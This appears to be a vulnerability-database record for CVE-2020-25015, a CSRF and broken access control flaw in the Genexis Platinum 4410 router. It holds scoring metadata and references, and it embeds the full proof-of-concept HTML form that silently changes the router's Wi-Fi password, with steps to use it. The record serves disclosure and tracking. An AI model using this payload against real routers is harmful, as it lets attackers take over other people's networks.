var-202009-0727
Vulnerability from variot
A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Date: 28-08-2020
Vendor Homepage: https://www.gxgroup.eu/ont-products/
Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
Version: v2.1 (software version P4410-V2-1.28)
CVE : CVE-2020-25015
-
Proof of Concept
Create an HTML file with the following code:
history.pushState('', '', '/') document.forms[0].submit();Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
-
PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
-
Timeline
Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410v2-1.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jinson Varghese Behanan",
"sources": [
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.7
},
"cve": "CVE-2020-25015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-25015",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-56086",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25015",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-25015",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-25015",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlHide\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusPort\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.forms[0].submit();\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "PACKETSTORM",
"id": "159936"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25015",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "159936",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "49000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"id": "VAR-202009-0727",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
]
},
"last_update_date": "2024-11-23T21:51:19.096000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
},
{
"title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/236092"
},
{
"title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=128996"
},
{
"title": "https://github.com/jinsonvarghese/jinsonvarghese",
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
},
{
"trust": 2.6,
"url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
},
{
"trust": 1.7,
"url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/49000"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese"
},
{
"trust": 0.1,
"url": "https://www.gxgroup.eu/ont-products/"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2020-09-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-09T17:26:50",
"db": "PACKETSTORM",
"id": "159936"
},
{
"date": "2020-09-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2020-09-16T18:15:13.390000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2022-11-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T06:57:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2024-11-21T05:16:31.130000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum cross-site request forgery vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…